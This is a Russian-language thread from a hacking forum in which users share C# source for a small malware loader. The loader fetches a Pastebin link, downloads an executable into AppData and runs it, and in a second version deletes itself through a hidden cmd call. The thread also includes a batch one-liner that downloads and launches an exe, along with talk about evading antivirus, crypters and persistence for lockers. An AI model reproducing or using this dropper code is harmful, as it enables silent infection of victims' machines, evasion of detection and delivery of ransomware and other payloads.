• XSS.stack #1 – первый литературный журнал от юзеров форума

[Исходник C#] Примитивный лоадер через pastebin в 5кб.

ViCode

ripper
КИДАЛА
Реакции
423
Пожалуйста, обратите внимание, что пользователь заблокирован
Увидел тему по соседству, ботнет на pastebin
Дай думаю попробую, простенький лоадер exe по ссылки размещенной на pastebin
Ссылка должна быть в raw формате прямая на ваш exe:
9e31ae2689.jpg

пароль на архив местный.

:smile11::smile11::smile11:

Вложения

• pastebinload.zip
    3.3 КБ · Просмотры: 54
а понту паблик лоадер юзать, даже если клейка хорошая то сигнатура быстро по антивирям расходится.
стаким успехом можно и бантик лоадером сделать
CMD @ echo >> start iexplore.exe http://www.website.com/ival.exe >> evil.bat cmd.exe /c evil.bat

на выхлопе evil.exe лоадер

Ну вообще суть такая что прикрутив автозагрузку можно менять ссылку на pastebin постоянно и грузить что то новое на те же машины.
Яж говорю :smile11:

лоадер ведь не записывает себя в аутозагрузку? его задача быть не заметным т.е. не оставлять следов

а подмена файла evil.exe на сервере будет иметь тот же эфект.

Последнее редактирование:
Он еще и фуд получился:

28b1bc439a.jpg
Щас после чека на этом сканере будет не фуд :smile4:

Интересно, есть сейчас в паблике малварь с блокчейн пу?

Щас после чека на этом сканере будет не фуд :smile4:
Месяц назад не сливал,х#й его знает кто пустил этот слух(либо я слишком везучий),чекнул уник стаб на этом сканнере был фуд,через неделю чекаю,детекты одни и теже.

криво написанный лодер
второй файл не скачает тк как уже есть l.exe
Криво код смотрел.
Он и не качает второй файл. Он переименовывает скачанный файл. А после запускает его.
Скрытый контент для зарегистрированных пользователей.

C#:
using System;
using System.Diagnostics;
using System.Net;

namespace pastebinload
{
    class Program
    {
        public static string p = new WebClient().DownloadString(""); //ссылка на pastebin: raw
        public static string d = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + ("\\"); // Путь
        static void Main(string[] args)
        {
            using (var client = new WebClient())
            {
                try
                {
                    client.DownloadFile(p, d + "\\l.exe"); // Скачиваем и называем файл l.exe
                    Process proc = Process.Start(d + "\\l.exe"); //Запускаем l.exe
                }
                catch { }
            }
        }
    }
}

лоадер ведь не записывает себя в аутозагрузку? его задача быть не заметным т.е. не оставлять следов
Есть нерезидентные (скачал-запустил и все), а есть резидентные.Ес-но, большинство кодят первый вариант, ибо автолоад=палево=сложнее и т.д. А так, зависит какие задачи. Для говнолокеров достаточно нерезидента , для чего-то серьезного желательно все же не терять комп после ребута.

Месяц назад не сливал,х#й его знает кто пустил этот слух(либо я слишком везучий),чекнул уник стаб на этом сканнере был фуд,через неделю чекаю,детекты одни и теже.
Я с опаской его юзаю, т.к были прецеденты после чека на нем билда который не куда не сливал. Что оказалось странным, потом увидел еще гневные посты в продажниках от некоторых авторов малвари.
Ну и в довесок что мне не нравится это CDN, хз как оно, но ddos-guard.net так себе cdn/

C#:
using System;
using System.Diagnostics;
using System.Net;
using System.Reflection;

namespace pastebinload
{
    class Program
    {
        public static string p = new WebClient().DownloadString(""); //ссылка на pastebin: raw
        public static string d = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + ("\\"); // Путь
        private static void Delet()
        {
            try
            {
                Process.Start(new ProcessStartInfo
                {
                    Arguments = "/C choice /C Y /N /D Y /T 3 & del \"" + 
                    new FileInfo(new Uri(Assembly.GetExecutingAssembly().CodeBase).LocalPath).Name + "\"",
                    WindowStyle = ProcessWindowStyle.Hidden,
                    CreateNoWindow = true,
                    FileName = "cmd.exe"
                }); //выполняет cmd команду на удаление с задежкой в 3сек
            }
            catch { }
        }
        static void Main(string[] args)
        {
            using (var client = new WebClient())
            {
                try
                {
                    client.DownloadFile(p, d + "\\l.exe"); // Скачиваем и называем файл l.exe
                    Process proc = Process.Start(d + "\\l.exe"); //Запускаем l.exe
                    Delet(); //после запуска удаляет сам себя
                }
                catch { }
            }
        }
    }
}
Не тестил, но у меня похожий код работает.

Криво код смотрел.
Он и не качает второй файл. Он переименовывает скачанный файл. А после запускает его.
Скрытое содержимое
сорь я думал ты это все в цыкле.

Я с опаской его юзаю, т.к были прецеденты после чека на нем билда который не куда не сливал. Что оказалось странным, потом увидел еще гневные посты в продажниках от некоторых авторов малвари.
Ну и в довесок что мне не нравится это CDN, хз как оно, но ddos-guard.net так себе cdn/
Ну,у меня подписка на криптор,мне лишь бы лоадер с антивм/дебаггером а криптую сам билд с мальварём я и так,раз в день

Ну,у меня подписка на криптор,мне лишь бы лоадер с антивм/дебаггером а криптую сам билд с мальварём я и так,раз в день
В этом случае чекни мою тему - https://xss.pro/threads/33349/ :)

Бесплатный сыр только в мышеловке.

некрасиво так пиарится,если честно

Я имел ввиду лоадер который не палится и не боится как этот слива на вирус тотал,а тут перекриптовывать сам лоадер я не вижу смысла

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх